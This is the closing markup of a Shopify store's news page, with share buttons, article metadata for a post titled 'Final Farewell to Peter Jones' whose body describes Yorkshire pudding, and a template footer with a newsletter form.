        <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-twitter" viewBox="0 0 20 20"><path d="M19.551 4.208q-.815 1.202-1.956 2.038 0 .082.02.255t.02.255q0 1.589-.469 3.179t-1.426 3.036-2.272 2.567-3.158 1.793-3.963.672q-3.301 0-6.031-1.773.571.041.937.041 2.751 0 4.911-1.671-1.284-.02-2.292-.784T2.456 11.85q.346.082.754.082.55 0 1.039-.163-1.365-.285-2.262-1.365T1.09 7.918v-.041q.774.408 1.773.448-.795-.53-1.263-1.396t-.469-1.864q0-1.019.509-1.997 1.487 1.854 3.596 2.924T9.81 7.184q-.143-.509-.143-.897 0-1.63 1.161-2.781t2.832-1.151q.815 0 1.569.326t1.284.917q1.345-.265 2.506-.958-.428 1.386-1.732 2.18 1.243-.163 2.262-.611z"></path></svg>
        <span class="social-sharing__title" aria-hidden="true">Tweet</span>
        <span class="visually-hidden">Tweet on Twitter</span>
      </a>
    </li><li class="social-sharing__item">
      <a target="_blank" href="https://pinterest.com/pin/create/button/?url=cdn.shopify.com/s/assets/no-image-2048-5e88c1b20e087fb7bbe9a3771824e743c244f437e4f8ba93bbf7b11b53f7824c_1024x1024.gif&amp;description=%EA%9C%B0%C9%AA%C9%B4%E1%B4%80%CA%9F%20%EA%9C%B0%E1%B4%80%CA%80%E1%B4%87%E1%B4%A1%E1%B4%87%CA%9F%CA%9F%20%E1%B4%9B%E1%B4%8F%20%E1%B4%98%E1%B4%87%E1%B4%9B%E1%B4%87%CA%80%20%E1%B4%8A%E1%B4%8F%C9%B4%E1%B4%87%EA%9C%B1" class="social-sharing__item-link" rel="noopener" aria-describedby="a11y-new-window-external-message">
        <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-pinterest" viewBox="0 0 20 20"><path d="M9.958.811q1.903 0 3.635.744t2.988 2 2 2.988.744 3.635q0 2.537-1.256 4.696t-3.415 3.415-4.696 1.256q-1.39 0-2.659-.366.707-1.147.951-2.025l.659-2.561q.244.463.903.817t1.39.354q1.464 0 2.622-.842t1.793-2.305.634-3.293q0-2.171-1.671-3.769t-4.257-1.598q-1.586 0-2.903.537T5.298 5.897 4.066 7.775t-.427 2.037q0 1.268.476 2.22t1.427 1.342q.171.073.293.012t.171-.232q.171-.61.195-.756.098-.268-.122-.512-.634-.707-.634-1.83 0-1.854 1.281-3.183t3.354-1.329q1.83 0 2.854 1t1.025 2.61q0 1.342-.366 2.476t-1.049 1.817-1.561.683q-.732 0-1.195-.537t-.293-1.269q.098-.342.256-.878t.268-.915.207-.817.098-.732q0-.61-.317-1t-.927-.39q-.756 0-1.269.695t-.512 1.744q0 .39.061.756t.134.537l.073.171q-1 4.342-1.22 5.098-.195.927-.146 2.171-2.513-1.122-4.062-3.44T.59 10.177q0-3.879 2.744-6.623T9.957.81z"></path></svg>
        <span class="social-sharing__title" aria-hidden="true">Pin it</span>
        <span class="visually-hidden">Pin on Pinterest</span>
      </a>
    </li></ul>




</div>
</article>

<div class="return-link-wrapper">
  <a href="#" class="button return-link">
    <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-arrow-back" viewBox="0 0 18 18"><path d="M1.5 9.347L10.414 1M9.674 17L1.502 8.653M1.648 9H17.5"></path></svg>
    Back to News
  </a>
</div>

<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "articleBody": "\nTraditional Yorkshire pudding to serve with roast beef, batter of flour, salt, eggs, butter, milk, cooked in pan with roast drippings.",
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https:\/\/tellsthetale.com"
  },
  "headline": "ꜰɪɴᴀʟ ꜰᴀʀᴇᴡᴇʟʟ ᴛᴏ ᴘᴇᴛᴇʀ ᴊᴏɴᴇꜱ",


  "datePublished": "2020-07-10T20:57:00Z",
  "dateCreated": "2020-07-10T20:59:32Z",
  "author": {
    "@type": "Person",
    "name": "Tells The Tale Admin"
  },
  "publisher": {
    "@type": "Organization",

    "name": "Tells The Tale"
  }
}
</script>

    </main>

    <div id="shopify-section-footer" class="shopify-section"><footer class="footer footer--has-blocks critical-hidden" role="contentinfo" data-section-id="footer" data-section-type="footer"><style data-shopify="">.footer {
      border-top: 1px solid #2D4F1E;
      color: #577B46;
    }

    .footer__title,
    .footer__newsletter-submit,
    .disclosure,
    .footer .disclosure-list__item--current .disclosure-list__option  {
      color: #2D4F1E;
    }

    .footer,
    .footer .disclosure-list {
      background-color: #EBF2EF;
    }

    .footer .disclosure-list__option {
      color: #577B46;
    }

    .footer .disclosure__toggle svg {
      stroke: #577B46;
    }

    .footer .disclosure__toggle {
      border-bottom-color: #577B46;
    }

    .footer .disclosure-list__option:hover,
    .footer .disclosure-list__option:focus {
      border-bottom: 1px solid #2D4F1E;
    }

    .footer__newsletter-submit:hover,
    .footer__newsletter-submit:focus {
      background-color: #2D4F1E;
      color: #EBF2EF;
    }</style><div class="footer__content footer__content--one-third"><div><p class="footer__title">Talk about your business</p><div class="rte">
                <p>Share store details, promotions, or brand content with your customers.</p>
              </div></div><div><p class="footer__title">Talk about your business</p><div class="rte">
                <p>Share store details, promotions, or brand content with your customers.</p>
              </div></div><div><p class="footer__title footer__title--newsletter">Newsletter</p><form method="post" action="#ContactFooter" id="ContactFooter" accept-charset="UTF-8" class="footer__newsletter-form form" data-form="" novalidate="novalidate"><input type="hidden" name="form_type" value="customer"><input type="hidden" name="utf8" value="✓"><input type="hidden" name="contact[tags]" value="newsletter">
                <div class="footer__newsletter-form-content"><div class="footer__newsletter-input-wrapper form__input-wrapper" data-form-input-wrapper="">
                    <label class="footer__newsletter-label form__input-label" for="NewsletterForm--footer">
                      Email address
                    </label>
                    <input id="NewsletterForm--footer" type="email" name="contact[email]" class="footer__newsletter-input form__input" value="" aria-required="true" required="" autocorrect="off" autocapitalize="off">
                  </div>
                  <button type="submit" class="footer__newsletter-submit" name="commit" id="Subscribe">
                    Subscribe
                  </button>
                </div></form></div></div><div class="footer__bottom-content"><ul class="footer-icons footer-icons--social" role="list"><li class="footer-icons__social-item">
          <a href="#" class="footer-icons__item-link">
            <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-rss" viewBox="0 0 20 20"><path d="M5.903 16.586a2.489 2.489 0 1 1-4.977 0 2.489 2.489 0 0 1 4.977 0zm7.053 2.489H9.43c0-4.688-3.817-8.505-8.505-8.505V7.044c6.638 0 12.031 5.393 12.031 12.031z"></path><path d="M15.445 19.075c0-8.028-6.493-14.52-14.52-14.52V.925c10.019 0 18.15 8.131 18.15 18.15h-3.63z"></path></svg>
            <span class="icon-fallback-text">RSS</span>
          </a>
        </li></ul>
<ul class="footer-icons footer-icons--social" role="list"><li class="footer-icons__social-item">
          <a href="#" class="footer-icons__item-link">
            <svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-rss" viewBox="0 0 20 20"><path d="M5.903 16.586a2.489 2.489 0 1 1-4.977 0 2.489 2.489 0 0 1 4.977 0zm7.053 2.489H9.43c0-4.688-3.817-8.505-8.505-8.505V7.044c6.638 0 12.031 5.393 12.031 12.031z"></path><path d="M15.445 19.075c0-8.028-6.493-14.52-14.52-14.52V.925c10.019 0 18.15 8.131 18.15 18.15h-3.63z"></path></svg>
            <span class="icon-fallback-text">RSS</span>
          </a>
        </li></ul>
</div><div class="footer__bottom-content footer__bottom-content--reverse">
    <div class="footer__copyright-content-wrapper">
      <small class="footer__copyright-content">© 2020, <a href="#" title="">Tells The Tale</a></small>
      <small class="footer__copyright-content"><a target="_blank" rel="noopener" href="https://www.shopify.com/?utm_campaign=poweredby&amp;utm_medium=shopify&amp;utm_source=onlinestore" aria-describedby="a11y-new-window-external-message">Powered by Shopify</a></small>
    </div></div>
</footer>


</div>

    <ul hidden="">
      <li id="a11y-refresh-page-message">Choosing a selection results in a full page refresh.</li>
      <li id="a11y-selection-message">Press the space key then arrow keys to make a selection.</li>
    </ul>

    <script>
      window.theme = {
        rootUrl: "/",
        stylesheet: "//cdn.shopify.com/s/files/1/0431/5293/3026/t/2/assets/theme.min.css?v=9461683503382388731",
        strings: {
          addToCart: "Add to Cart",
          cartError: "There was an error while updating your cart. Please try again.",
          external: "Opens external website.",
          newWindow: "Opens in a new window.",
          newWindowExternal: "Opens external website in a new window.",
          quantityError: "You can only add [quantity] \u003cstrong\u003e[title]\u003c\/strong\u003e to your cart.",
          quantityMinimumMessage: "Quantity must be 1 or more",
          regularPrice: "Regular price",
          salePrice: "Sale price",
          soldOut: "Sold Out",
          unavailable: "Unavailable",
          unitPrice: "Unit price",
          unitPriceSeparator: "per",
          subtotal: "Subtotal",
          mediaCarousel: "Carousel"
        },
        moneyFormat: "${{amount}}",
        moneyFormatWithCurrency: "${{amount}} SGD"
      };
    </script>
    <script src="./piter_files/vendor.min.js" defer="defer"></script><script src="./piter_files/theme.min.js" defer="defer"></script>


<ul hidden="true"><li id="a11y-new-window-message">Opens in a new window.</li><li id="a11y-external-message">Opens external website.</li><li id="a11y-new-window-external-message">Opens external website in a new window.</li></ul></body></html>
